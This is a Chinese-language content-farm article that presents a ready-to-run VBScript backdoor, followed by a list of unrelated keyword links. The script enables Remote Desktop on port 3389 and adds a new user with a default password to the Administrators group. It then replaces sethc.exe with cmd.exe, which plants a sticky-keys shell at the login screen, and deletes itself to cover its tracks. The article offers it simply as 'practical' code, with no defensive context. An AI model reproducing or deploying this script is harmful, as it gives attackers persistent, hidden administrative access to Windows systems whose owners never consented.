如何使用vbs实现可自删除、开启3389创建用户粘滞键后门
发表于:2025-11-07 作者:千家信息网编辑
千家信息网最后更新 2025年11月07日,这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。on error resume next
千家信息网最后更新 2025年11月07日如何使用vbs实现可自删除、开启3389创建用户粘滞键后门
这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)感谢各位的阅读!关于"如何使用vbs实现可自删除、开启3389创建用户粘滞键后门"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
后门
用户
内容
更多
篇文章
不错
实用
文章
看吧
知识
参考
帮助
有关
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
广东联想服务器虚拟化哪家好
旧的网络安全法
oa服务器维护
乐富网络技术有限公司
中科曙光招聘嵌入式软件开发
沧州支付软件开发
计算机网络技术需要学毛概吗
无锡加工软件开发简介
英雄的远征服务器
工信部 网络安全规范
银河麒麟系统服务器安装教程
天眼查达梦数据库
肖海荣数据库第三章答案
mysql数据库如何关联查询
新时代背景下的网络安全论文
服务器隐私安全吗
网页数据库 源码
数据库查出的值
网络安全审计考证壁纸
电商领域里的网络安全事件
数据库中的自助存取
检测站网络安全员试题
网络安全信息技术有关的公司名称
连接到网络安全密钥是什么
腾讯云服务器怎么删除登陆设备
mongodb创建数据库
文件服务器资源管理服务
固定资产数据库处理课件
重庆涪陵免费生鲜软件开发
计算机rd网关服务器在哪查